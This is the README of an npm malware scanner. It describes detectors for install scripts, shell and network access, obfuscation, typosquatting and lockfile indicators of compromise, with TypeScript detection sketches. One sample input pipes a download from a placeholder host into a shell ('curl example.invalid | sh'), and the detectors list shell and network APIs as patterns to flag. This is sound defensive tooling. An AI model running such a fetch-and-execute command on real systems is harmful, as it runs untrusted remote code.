npm-malware-scanner
v3.0.0
Real-time malware scanner for npm packages
NPM Malware Scanner
Real-time malware scanner for npm packages. Detects install scripts, shell access, obfuscated code, network access, filesystem access, typosquatting attacks, and known-compromised supply chain versions.
Key Resources Used
Supply Chain Security:
- npm Security Best Practices - Understanding npm security model
- OWASP Top 10 for CI/CD - CI/CD security risks
Static Analysis Techniques:
- Babel Parser Documentation - AST parsing for JavaScript/TypeScript
- ESLint Source Code - Pattern matching and code analysis techniques
- Shannon Entropy - Obfuscation detection using information theory
Typosquatting Research:
- Levenshtein Distance Algorithm - String similarity measurement
- Typosquatting on PyPI - Academic research on package name attacks
- npm Typosquatting Attacks - Real-world examples
npm Registry APIs:
- npm Registry API - Package metadata and download
- CouchDB Changes Feed - Real-time monitoring
Notable CVEs & Attacks:
- CVE-2021-44906 - Minimist prototype pollution
- event-stream incident - Malicious dependency injection
- ua-parser-js attack - Cryptocurrency miner in popular package
Installation
# Global installation
npm install -g npm-malware-scanner
# Or use directly with npx
npx npm-malware-scanner express 4.18.2
Usage
Scan a Package
npm-scanner <package-name> <version>
# Examples
npm-scanner express 4.18.2
npm-scanner axios 1.6.0
Live Monitoring
Monitor the npm registry feed in real-time:
npm-scanner --live
Lockfile Scan
Scan package-lock.json, yarn.lock, or pnpm-lock.yaml for known-compromised versions and IOC dependencies without hitting the registry:
# Scan lockfiles in the current directory
npm-scanner --lockfile
# Scan lockfiles in a specific directory
npm-scanner --lockfile ./path/to/project
This mode is useful when a version has already been unpublished from npm (as happened with [email protected] and [email protected]). In that case registry-based scanning returns 404, but lockfile evidence of prior installation remains.
CI/CD Integration
The scanner automatically detects CI/CD environments and adapts output format.
GitHub Actions:
- name: Security Scan
run: npm-scanner express 4.18.2
Other CI Systems:
CI=true npm-scanner express 4.18.2
See CI-CD-INTEGRATION.md for detailed integration guides.
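To make the environment detection concrete, here is a minimal sketch of how an output mode could be chosen from environment variables. The function names, the `OutputMode` type, and the exact output strings are assumptions for illustration and are not taken from the scanner's source. The only external facts relied on are that GitHub Actions sets `GITHUB_ACTIONS=true` and understands `::error::` and `::warning::` workflow commands.

```typescript
// Hypothetical sketch: names and output strings are illustrative,
// not the scanner's real logger or environment module.
type OutputMode = 'github-actions' | 'ci' | 'terminal';

// Pick an output mode from environment variables.
// GitHub Actions sets both GITHUB_ACTIONS=true and CI=true, so it is checked first.
function detectOutputMode(env: Record<string, string | undefined>): OutputMode {
  if (env['GITHUB_ACTIONS'] === 'true') return 'github-actions';
  if (env['CI'] === 'true' || env['CI'] === '1') return 'ci';
  return 'terminal';
}

// Format one alert line for the chosen mode.
function formatAlert(mode: OutputMode, severity: 'high' | 'medium', message: string): string {
  switch (mode) {
    case 'github-actions':
      // Workflow commands are rendered as annotations in the Actions UI.
      return `::${severity === 'high' ? 'error' : 'warning'}::${message}`;
    case 'ci':
      // Plain, uncolored text that reads well in log files.
      return `[${severity.toUpperCase()}] ${message}`;
    default:
      return `${severity}: ${message}`;
  }
}

// Prints "[HIGH] postinstall script found"
console.log(formatAlert(detectOutputMode({ CI: 'true' }), 'high', 'postinstall script found'));
```

In a real CLI the `env` argument would typically be `process.env`; passing it in explicitly keeps the function easy to test.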
Detection Capabilities
Install Scripts
Identifies packages with lifecycle scripts that execute arbitrary code:
- preinstall, install, postinstall
- preuninstall, uninstall, postuninstall
Severity: High
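As an illustration, lifecycle script detection can be reduced to a lookup in the `scripts` field of a parsed `package.json`. The sketch below assumes that approach; `findLifecycleScripts`, `PackageManifest`, and `LifecycleHit` are hypothetical names, not the scanner's actual API.

```typescript
// Hypothetical helper; names are illustrative, not the scanner's actual API.
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preuninstall', 'uninstall', 'postuninstall',
] as const;

interface PackageManifest {
  scripts?: Record<string, string>;
}

interface LifecycleHit {
  hook: string;
  command: string;
}

// Return every lifecycle hook declared in a parsed package.json,
// together with the command it would run.
function findLifecycleScripts(manifest: PackageManifest): LifecycleHit[] {
  const scripts = manifest.scripts ?? {};
  const hits: LifecycleHit[] = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command === 'string') hits.push({ hook, command });
  }
  return hits;
}

const demoManifest: PackageManifest = JSON.parse(
  '{"scripts":{"test":"jest","postinstall":"node setup.js"}}',
);
// Logs a single hit for the postinstall hook; "test" is not a lifecycle hook.
console.log(findLifecycleScripts(demoManifest));
```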
Shell Access
Detects use of child_process APIs that can run system commands:
- exec, execSync, spawn, spawnSync, execFile
- Shell command strings passed to process execution
Severity: High
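A rough regex-only sketch of this check follows. It is an assumption about one possible approach, not the scanner's implementation, which may use AST parsing. `findShellAccess` and both patterns are hypothetical. The check reports method names only when the file also imports `child_process`, which avoids flagging unrelated calls such as `RegExp.prototype.exec`.

```typescript
// Illustrative patterns only; a production detector would likely use an AST.
const CHILD_PROCESS_IMPORT = /(?:require\(\s*|from\s+)['"](?:node:)?child_process['"]/;
const CHILD_PROCESS_CALL = /\b(execSync|execFile|spawnSync|exec|spawn)\s*\(/;

// Return the sorted, de-duplicated child_process methods called in `source`,
// or an empty list when the module is never imported.
function findShellAccess(source: string): string[] {
  if (!CHILD_PROCESS_IMPORT.test(source)) return [];
  const callPattern = new RegExp(CHILD_PROCESS_CALL.source, 'g');
  const methods: string[] = [];
  let match: RegExpExecArray | null;
  while ((match = callPattern.exec(source)) !== null) {
    if (methods.indexOf(match[1]) === -1) methods.push(match[1]);
  }
  return methods.sort();
}

const shellSample = [
  "const cp = require('child_process');",
  "cp.execSync('id');",
  "cp.spawn('sh', ['-c', 'curl example.invalid | sh']);",
].join('\n');
// Prints [ 'execSync', 'spawn' ]
console.log(findShellAccess(shellSample));
```

Because the match is textual, aliased or dynamically constructed calls would slip past this sketch.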
Obfuscated Code
Calculates Shannon entropy on each source file. Files with entropy above the threshold are flagged as likely obfuscated or encoded payloads.
Severity: High
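For reference, Shannon entropy over a file's characters is H = -Σ p_i · log2(p_i), where p_i is the relative frequency of character i. The sketch below computes it per UTF-16 code unit. The default threshold of 5.0 bits per character is an assumed placeholder, since the scanner's actual threshold is not stated here, and the function names are hypothetical.

```typescript
// Shannon entropy in bits per character: H = -sum(p_i * log2(p_i)).
function shannonEntropy(text: string): number {
  if (text.length === 0) return 0;
  const counts = new Map<string, number>();
  for (let i = 0; i < text.length; i++) {
    const ch = text.charAt(i);
    counts.set(ch, (counts.get(ch) ?? 0) + 1);
  }
  let entropy = 0;
  counts.forEach((count) => {
    const p = count / text.length;
    entropy -= p * Math.log2(p);
  });
  return entropy;
}

// ASSUMPTION: 5.0 is an illustrative cutoff, not the scanner's real threshold.
function isLikelyObfuscated(text: string, threshold = 5.0): boolean {
  return shannonEntropy(text) > threshold;
}

console.log(shannonEntropy('aaaa')); // a single repeated symbol carries no information
console.log(shannonEntropy('abab')); // two equally likely symbols give 1 bit per character
console.log(isLikelyObfuscated('function add(a, b) { return a + b; }'));
```

Ordinary source code reuses a small alphabet and tends to score lower than base64 or hex blobs, which is why a single cutoff is a workable heuristic.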
Typosquatting
Compares the package name against the top npm packages using Levenshtein distance. Close matches are flagged as potential brand-jacking attempts.
Severity: High (very close match) / Medium
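The comparison can be sketched with a standard two-row dynamic-programming Levenshtein implementation. The popular-package list and the `maxDistance` cutoff of 2 below are assumptions chosen for illustration; the scanner's real list and thresholds are not specified here.

```typescript
// Classic Levenshtein edit distance using two rolling rows.
function levenshtein(a: string, b: string): number {
  let prev: number[] = [];
  for (let j = 0; j <= b.length; j++) prev.push(j);
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      curr[j] = Math.min(
        prev[j] + 1,        // deletion
        curr[j - 1] + 1,    // insertion
        prev[j - 1] + cost, // substitution
      );
    }
    prev = curr;
  }
  return prev[b.length];
}

interface TyposquatMatch {
  target: string;
  distance: number;
}

// ASSUMPTION: maxDistance = 2 is an illustrative cutoff.
// Distance 0 is skipped because it means the name IS the popular package.
function findTyposquatTargets(name: string, popular: string[], maxDistance = 2): TyposquatMatch[] {
  const matches: TyposquatMatch[] = [];
  for (const target of popular) {
    const distance = levenshtein(name, target);
    if (distance > 0 && distance <= maxDistance) matches.push({ target, distance });
  }
  return matches;
}

// Hypothetical short list standing in for the top npm packages.
const popularSample = ['express', 'lodash', 'react', 'axios'];
console.log(findTyposquatTargets('expresss', popularSample)); // one edit away from "express"
```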
Network Access
Detects packages making network requests:
- Node.js modules: http, https, net, dgram, dns
- Browser APIs: fetch, XMLHttpRequest, WebSocket, EventSource
- Popular libraries: axios, node-fetch, got, superagent, request
Severity: Medium
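The regex half of such a check might look like the sketch below, which extracts module specifiers from `require` and `import` statements and looks for calls to the browser-style globals. This is an assumed simplification with hypothetical names; the scanner's actual detector combines AST parsing with regex patterns.

```typescript
// Module names and globals taken from the lists above.
const NETWORK_MODULES = ['http', 'https', 'net', 'dgram', 'dns',
  'axios', 'node-fetch', 'got', 'superagent', 'request'];
const NETWORK_GLOBALS = ['fetch', 'XMLHttpRequest', 'WebSocket', 'EventSource'];

// Collect capture group 1 for every match of `pattern` in `source`.
function collectMatches(pattern: RegExp, source: string): string[] {
  const re = new RegExp(pattern.source, 'g');
  const found: string[] = [];
  let m: RegExpExecArray | null;
  while ((m = re.exec(source)) !== null) found.push(m[1]);
  return found;
}

function uniqueSorted(values: string[]): string[] {
  return values.filter((v, i) => values.indexOf(v) === i).sort();
}

// Hypothetical helper: report which network modules are imported and
// which network globals are called in a source string.
function findNetworkAccess(source: string): { modules: string[]; globals: string[] } {
  const specifiers = collectMatches(/(?:require\(\s*|from\s+|import\s+)['"]([^'"]+)['"]/, source)
    .map((s) => s.replace(/^node:/, '')); // treat "node:https" like "https"
  const modules = uniqueSorted(specifiers.filter((s) => NETWORK_MODULES.indexOf(s) !== -1));
  const globalCall = new RegExp('\\b(' + NETWORK_GLOBALS.join('|') + ')\\s*\\(');
  const globals = uniqueSorted(collectMatches(globalCall, source));
  return { modules, globals };
}

const networkSample = [
  "import https from 'node:https';",
  'const got = require("got");',
  "fetch('https://example.com');",
].join('\n');
// Prints { modules: [ 'got', 'https' ], globals: [ 'fetch' ] }
console.log(findNetworkAccess(networkSample));
```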
Filesystem Access
Detects use of fs module operations that read, write, or modify files on disk:
- writeFile, appendFile, unlink, rename, chmod, chown
- Recursive directory operations (rmdir, rm)
Severity: Medium
Known Compromised Version
Checks the requested version against a built-in database of known supply chain incidents. When a version matches and has been unpublished from npm (returning 404), the scanner reports it as a confirmed IOC rather than a generic fetch failure, and automatically runs a lockfile scan.
Severity: High
Lockfile Match
When scanning lockfiles (--lockfile mode or triggered automatically after a known-compromised 404), every resolved dependency is checked against the known-bad version list and IOC dependency list (e.g. plain-crypto-js from the axios incident).
Severity: High
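A minimal sketch of the lockfile check for `package-lock.json` is shown below. It assumes lockfileVersion 2 or 3, where resolved dependencies live under a `packages` object keyed by install path. The data shapes, function name, and the `example-compromised-pkg` entry are hypothetical placeholders; only `plain-crypto-js` comes from the text above.

```typescript
// Hypothetical data shapes; the real src/ioc/known-bad.ts may differ.
type KnownBadVersions = Record<string, string[]>;

interface PackageLock {
  // lockfileVersion 2 and 3 key each entry by its install path.
  packages?: Record<string, { version?: string }>;
}

interface LockfileHit {
  name: string;
  version: string;
  reason: 'known-bad-version' | 'ioc-dependency';
}

const NODE_MODULES_PREFIX = 'node_modules/';

function scanPackageLock(
  lock: PackageLock,
  knownBad: KnownBadVersions,
  iocDependencies: string[],
): LockfileHit[] {
  const hits: LockfileHit[] = [];
  const packages = lock.packages ?? {};
  for (const installPath of Object.keys(packages)) {
    const idx = installPath.lastIndexOf(NODE_MODULES_PREFIX);
    if (idx === -1) continue; // root project ("") or a workspace folder
    // "node_modules/a/node_modules/@scope/b" resolves to "@scope/b".
    const name = installPath.slice(idx + NODE_MODULES_PREFIX.length);
    const version = packages[installPath].version ?? '';
    if (iocDependencies.indexOf(name) !== -1) {
      hits.push({ name, version, reason: 'ioc-dependency' });
    } else if ((knownBad[name] ?? []).indexOf(version) !== -1) {
      hits.push({ name, version, reason: 'known-bad-version' });
    }
  }
  return hits;
}

// Placeholder entries for illustration; not real incident data.
const sampleKnownBad: KnownBadVersions = { 'example-compromised-pkg': ['9.9.9'] };
const sampleLock: PackageLock = {
  packages: {
    '': { version: '1.0.0' },
    'node_modules/example-compromised-pkg': { version: '9.9.9' },
    'node_modules/plain-crypto-js': { version: '1.0.0' },
    'node_modules/left-alone': { version: '2.0.0' },
  },
};
console.log(scanPackageLock(sampleLock, sampleKnownBad, ['plain-crypto-js']));
```

Supporting yarn.lock and pnpm-lock.yaml would need separate parsers, since neither is JSON.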
Architecture
src/
├── cli.ts # CLI entry point (scan, --live, --lockfile)
├── scanner.ts # Scan orchestration
├── types.ts # TypeScript interfaces & AlertType enum
├── detectors/
│ ├── install-scripts.ts # Lifecycle script detection
│ ├── network-access.ts # Network access detection (AST + regex)
│ ├── typosquat.ts # Typosquat detection (Levenshtein distance)
│ ├── filesystem-access.ts # Filesystem write/delete detection
│ ├── obfuscation.ts # Shannon entropy analysis
│ └── shell-access.ts # child_process / exec detection
├── ioc/
│ ├── known-bad.ts # Known-compromised version database
│ └── lockfile-scanner.ts # Lockfile IOC scanner (npm/yarn/pnpm)
├── npm/
│ ├── registry.ts # Package fetching, extraction, 404 handling
│ └── feed.ts # Live CouchDB changes feed monitoring
└── utils/
    ├── logger.ts # Output formatting (terminal, CI, GitHub Actions)
    └── environment.ts # CI/CD environment detection
Design Decisions
Static Analysis Only
Choice: Analyze code without execution
Rationale: Safe, fast (typically 500ms to 2s per package), effective for most threats
Tradeoff: Cannot detect runtime behavior or heavily obfuscated code
Hybrid Detection (AST + Regex)
Choice: Combine AST parsing with regex patterns
Rationale: AST for accuracy, regex for obfuscated/dynamic code
Tradeoff: Slightly slower but more comprehensive
Popular Packages for Typosquat
Choice: Compare only against top npm packages
Rationale: Fast, practical, low false positives
Tradeoff: Misses typosquats of less popular packages
Extending the Scanner
Adding a New Detector
Create a detector file:
// src/detectors/my-detector.ts
import { Alert, DetectorResult } from '../types';

export class MyDetector {
  static async detect(packagePath: string): Promise<DetectorResult> {
    const alerts: Alert[] = [];
    // Your detection logic
    return { detected: alerts.length > 0, alerts };
  }
}
Register in `src/scanner.ts`:
import { MyDetector } from './detectors/my-detector';

const [installScriptResult, networkAccessResult, typosquatResult, myResult] =
  await Promise.all([
    InstallScriptDetector.detect(packageInfo.extractedPath),
    NetworkAccessDetector.detect(packageInfo.extractedPath),
    TyposquatDetector.detect(packageName),
    MyDetector.detect(packageInfo.extractedPath), // Add here
  ]);
alerts.push(...myResult.alerts);
Development
# Clone and setup
git clone https://github.com/Sunrostern/npm-scanner
cd npm-scanner
pnpm install
# Build
pnpm build
# Run tests
pnpm test
# Test with coverage
pnpm test:coverage
# Test a package
pnpm start express 4.18.2
# Test in CI mode
CI=true pnpm start express 4.18.2
Testing
The project includes comprehensive unit tests for all detectors:
# Run all tests
pnpm test
# Watch mode
pnpm test:watch
# Coverage report
pnpm test:coverage
Test Coverage:
- Install script detection
- Shell access detection (child_process, exec, spawn)
- Obfuscation detection (entropy analysis)
- Network access detection (http, fetch, axios, etc.)
- Filesystem access detection (fs module operations)
- Typosquat detection (Levenshtein distance)
- Edge cases and error handling
Known Limitations
- Static analysis only - Cannot detect runtime behavior or dynamically constructed payloads
- Registry-dependent - If a version has been unpublished, its tarball cannot be fetched or analyzed; the scanner falls back to lockfile IOC mode
- Obfuscation ceiling - Sufficiently layered obfuscation may fall below the entropy threshold
- False positives - Legitimate packages may trigger alerts (e.g., HTTP clients flagged for network access)
- Known-bad database - Only incidents explicitly added to src/ioc/known-bad.ts are covered; zero-day supply chain attacks are not detected until the database is updated
Performance
- Single package scan: 500ms - 2s
- Network detection: 100-500ms
- Typosquat check: ~50ms
- Live mode throughput: 1-2 packages/second
Contributing
Contributions welcome! Areas of interest:
- Expanding src/ioc/known-bad.ts with new supply chain incidents
- New detectors (crypto mining, prototype pollution, data exfiltration patterns)
- Performance improvements (parallel lockfile parsing, caching)
- Better obfuscation detection (multi-pass entropy, AST-based deobfuscation)
- Additional CI/CD integrations
License
MIT
